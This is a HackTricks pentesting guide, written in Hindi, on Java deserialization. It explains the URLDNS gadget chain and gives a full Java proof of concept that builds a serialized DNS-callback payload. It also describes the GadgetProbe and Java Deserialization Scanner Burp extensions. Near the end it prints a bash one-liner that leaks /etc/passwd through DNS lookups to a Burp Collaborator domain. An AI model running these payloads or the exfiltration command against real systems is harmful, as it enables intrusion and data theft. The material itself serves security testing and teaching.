hacktricks/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

188 lines
14 KiB
Markdown

# Java DNS Deserialization, GadgetProbe और Java Deserialization Scanner
{{#include ../../banners/hacktricks-training.md}}
## Deserialization पर DNS अनुरोध
क्लास `java.net.URL` `Serializable` को लागू करता है, इसका मतलब है कि यह क्लास सीरियलाइज किया जा सकता है।
```java
public final class URL implements java.io.Serializable {
```
इस क्लास का **अजीब व्यवहार** है। दस्तावेज़ से: “**दो होस्ट को समान माना जाता है यदि दोनों होस्ट नामों को समान IP पतों में हल किया जा सके**।”\
फिर, हर बार जब एक URL ऑब्जेक्ट **`equals`** या **`hashCode`** में से **किसी भी** फ़ंक्शन को कॉल करता है, तो **IP पता** प्राप्त करने के लिए एक **DNS अनुरोध** **भेजा** जाएगा।
**`hashCode`** फ़ंक्शन को एक **URL** ऑब्जेक्ट से **कॉल करना** काफी आसान है, बस इस ऑब्जेक्ट को एक `HashMap` के अंदर डालना है जिसे डीसिरियलाइज़ किया जाने वाला है। इसका कारण यह है कि **`HashMap`** के **`readObject`** फ़ंक्शन के अंत में यह कोड निष्पादित होता है:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[ ... ]
for (int i = 0; i < mappings; i++) {
[ ... ]
putVal(hash(key), key, value, false, false);
}
```
यह **चल रहा है** `putVal` को `HashMap` के अंदर हर मान के साथ **निष्पादित** करने के लिए। लेकिन, अधिक प्रासंगिक है `hash` को हर मान के साथ कॉल करना। यह `hash` फ़ंक्शन का कोड है:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
जैसा कि आप देख सकते हैं, **जब डीसिरियलाइज़ किया जाता है** एक **`HashMap`** को, तो फ़ंक्शन `hash` **हर ऑब्जेक्ट के साथ** **निष्पादित** होने जा रहा है और **`hash`** निष्पादन के **दौरान** **ऑब्जेक्ट का `.hashCode()`** **निष्पादित** किया जाएगा। इसलिए, यदि आप **एक `HashMap`** **जिसमें** एक **URL** ऑब्जेक्ट है, **डीसिरियलाइज़** करते हैं, तो **URL ऑब्जेक्ट** **`.hashCode()`** **निष्पादित** करेगा।
अब, चलिए `URLObject.hashCode()` के कोड पर नज़र डालते हैं:
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
```
जैसा कि आप देख सकते हैं, जब एक `URLObject` `.hashCode()` को निष्पादित करता है, तो इसे `hashCode(this)` कहा जाता है। एक निरंतरता में, आप इस फ़ंक्शन का कोड देख सकते हैं:
```java
protected int hashCode(URL u) {
int h = 0;
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
// Generate the host part.
InetAddress addr = getHostAddress(u);
[ ... ]
```
आप देख सकते हैं कि `getHostAddress` डोमेन पर निष्पादित किया जाता है, **एक DNS क्वेरी लॉन्च करते हुए**
इसलिए, इस वर्ग का **दुरुपयोग** किया जा सकता है ताकि **DNS क्वेरी लॉन्च** की जा सके **यह प्रदर्शित करने के लिए** कि **डिसेरियलाइजेशन** संभव है, या यहां तक कि **जानकारी निकालने** के लिए (आप एक कमांड निष्पादन के आउटपुट को उपडोमेन के रूप में जोड़ सकते हैं)।
### URLDNS पेलोड कोड उदाहरण
आप [ysoserial से URDNS पेलोड कोड यहाँ](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java) पा सकते हैं। हालाँकि, इसे कोड करना समझने में आसान बनाने के लिए मैंने अपना खुद का PoC बनाया (जो ysoserial से आधारित है):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;
public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);
//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}
class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### अधिक जानकारी
- [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
- मूल विचार में कॉमन कलेक्शंस पेलोड को DNS क्वेरी करने के लिए बदला गया था, यह प्रस्तावित विधि की तुलना में कम विश्वसनीय था, लेकिन यह पोस्ट है: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
## GadgetProbe
आप [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) को Burp Suite App Store (Extender) से डाउनलोड कर सकते हैं।
**GadgetProbe** यह पता लगाने की कोशिश करेगा कि क्या कुछ **Java क्लासेस मौजूद हैं** सर्वर की Java क्लास पर ताकि आप जान सकें **क्या** यह **किसी ज्ञात एक्सप्लॉइट** के लिए **संवेदनशील** है।
### यह कैसे काम करता है
**GadgetProbe** पिछले अनुभाग के समान **DNS पेलोड** का उपयोग करेगा लेकिन DNS क्वेरी चलाने से **पहले** यह **एक मनमानी क्लास को डीसिरियलाइज़** करने की कोशिश करेगा। यदि **मनमानी क्लास मौजूद है**, तो **DNS क्वेरी** **भेजी** जाएगी और GadgetProbe नोट करेगा कि यह क्लास मौजूद है। यदि **DNS** अनुरोध **कभी नहीं भेजा गया**, तो इसका मतलब है कि **मनमानी क्लास को सफलतापूर्वक डीसिरियलाइज़** नहीं किया गया, इसलिए या तो यह मौजूद नहीं है या यह **डीसिरियलाइज़ेबल/एक्सप्लॉइटेबल** नहीं है।
गिटहब के अंदर, [**GadgetProbe में कुछ वर्डलिस्ट्स हैं**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) जिनमें परीक्षण के लिए Java क्लासेस हैं।
![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../images/intruder4 (1) (1).gif>)
### अधिक जानकारी
- [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
## Java Deserialization Scanner
यह स्कैनर Burp App Store (**Extender**) से **डाउनलोड** किया जा सकता है।\
यह **एक्सटेंशन** में **पैसिव** और सक्रिय **क्षमताएँ** हैं।
### पैसिव
डिफ़ॉल्ट रूप से यह **पैसिवली** सभी अनुरोधों और प्रतिक्रियाओं की जांच करता है **Java सीरियलाइज्ड मैजिक बाइट्स** की तलाश में और यदि कोई पाया जाता है तो एक संवेदनशीलता चेतावनी प्रस्तुत करेगा:
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../images/image (765).png>)
### सक्रिय
**मैनुअल परीक्षण**
आप एक अनुरोध का चयन कर सकते हैं, राइट-क्लिक करें और `Send request to DS - Manual Testing` चुनें।\
फिर, _Deserialization Scanner Tab_ --> _Manual testing tab_ के अंदर आप **इंसर्शन पॉइंट** का चयन कर सकते हैं। और **परीक्षण शुरू करें** (उपयुक्त हमले का चयन करें जो उपयोग की गई एन्कोडिंग के आधार पर हो)।
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/3-1.png)
हालांकि इसे "मैनुअल परीक्षण" कहा जाता है, यह काफी **स्वचालित** है। यह स्वचालित रूप से जांच करेगा कि **डीसिरियलाइजेशन** **किसी भी ysoserial पेलोड** के लिए **संवेदनशील** है, वेब सर्वर पर मौजूद पुस्तकालयों की जांच करेगा और संवेदनशील वाले को हाइलाइट करेगा। **संवेदनशील पुस्तकालयों** की **जांच** करने के लिए आप **Javas Sleeps**, **CPU** खपत के माध्यम से **sleeps**, या पहले उल्लेखित **DNS** का उपयोग करने का चयन कर सकते हैं।
**एक्सप्लॉइटिंग**
एक बार जब आप एक संवेदनशील पुस्तकालय की पहचान कर लेते हैं, तो आप अनुरोध को _Exploiting Tab_ में भेज सकते हैं।\
इस टैब में आपको फिर से **इंजेक्शन पॉइंट** का **चयन** करना होगा, और जिस **संवेदनशील पुस्तकालय** के लिए आप एक पेलोड बनाना चाहते हैं, और **कमांड** लिखना होगा। फिर, बस उपयुक्त **हमला** बटन दबाएं।
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/4.png)
### Java Deserialization DNS Exfil जानकारी
अपने पेलोड को कुछ इस तरह निष्पादित करें:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### अधिक जानकारी
- [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
{{#include ../../banners/hacktricks-training.md}}